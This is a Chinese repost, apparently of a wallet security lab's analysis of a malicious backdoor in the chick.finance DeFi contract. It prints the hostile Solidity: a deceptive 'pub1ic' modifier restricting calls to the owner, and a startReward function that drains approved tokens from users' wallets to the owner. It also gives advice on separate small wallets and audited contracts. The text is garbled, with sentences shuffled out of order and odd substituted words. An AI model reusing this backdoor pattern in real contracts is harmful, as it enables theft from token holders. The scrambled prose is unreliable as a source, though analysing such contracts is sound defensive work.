内容如下:
网上报道说,8月25日,YFII 传递了 chick.finance 合约代码的风险,不外个中提到的“用户充值的所有代币,开拓者都有权限提取”这句话其实并不是完全精确的,因此在这里我们需要给各人做下更具体的描写:
周末时间名贵,本日长文就上面这些内容。我向各人烦琐几个要害点可以防备上述风险问题。
这其实是 DeFi 生态里很是严重的恶性事件,理应引起全行业的重视,因为这次大概恶意开拓者只是用拼写错误的方法来试图蒙骗各人(把 public 写成 pub1ic),然后很幸运的第一时间被发明白,,那下次呢?是不是可以写出逻辑巨大而且很难被看出来的裂痕,悄悄的期待上线把列位的钱包一扫而空呢?
要再次强调的是,这个例子中,您损失的可不只仅是您存入合约的资产,而是你钱包里的全部资产,大白了吗?
我想起最近一个月,我也努力介入DEFI的热点,参加了不少挖矿。
第一个是不要嫌贫苦,保管好本身主要钱包。每次拿出别的一个小号的钱包,介入各类deFi挖矿勾当。这个钱包里不要放太多的钱,需要用的话随时转进去。
大大都人城市躲不外去的!
万卉Dovey: 没有自带合约审计。。谁敢玩新的矿
这正是比特派安详尝试室在之前的那篇《以太坊 Defi 生态当前最大的安详隐患》一文中提到的“滥用合约授权问题”。
恶意代码是如下这段:
我们之前在向全行业提出“滥用合约授权”问题的时候,就曾估量到大概会有开拓者作恶的环境呈现,没想到这一天来的这么快,这次代码伪装的较量蠢,那下次呢?下次 DeFi 矿工们是否还能躲得已往了呢?
上述代码的逻辑很简朴,干的就是那些给这个合约授权了的用户,合约 Owner 都能把你的代币转给 Owner,就这么简朴。
于是深入研究一下,网上又搜到一篇报道。
于是深入研究雷同报道,下面发给各人比特派一篇更具体的研究文章。
modifier pub1ic() {require(isOwner(), "Ownable: caller is not the owner");_;}
大佬神鱼BTCer也回覆到: 套路很溜啊!
第二是不要介入未经审计的合约挖矿,就算要介入,也是拿点小钱,就算丢了也不心疼的金额介入。
该合约恶意代码的问题并不在于“开拓者事发后能提取用户存在合约中的代币”(开拓者原来就醒目这事儿),而在于对付任何给该合约授权了的用户,开拓者都能把你钱包里的代币一扫而空(不只仅是你存入合约的)
function startReward(address _from, uint256 amount) external pub1ic{weth.safeTransferFrom(_from, owner(), amount);}
开拓者对存心拼写错误的 pub1ic 做了如下约束(也就是只有合约 Owner 才气挪用,假如没这个挪用,那就酿成谁都醒目这事儿了,开拓者想的是本身偷,必定不想让别人偷)
郑重声明:本文版权归原作者所有,转载文章仅为传播更多信息之目的,如作者信息标记有误,请第一时间联系我们修改或删除,多谢。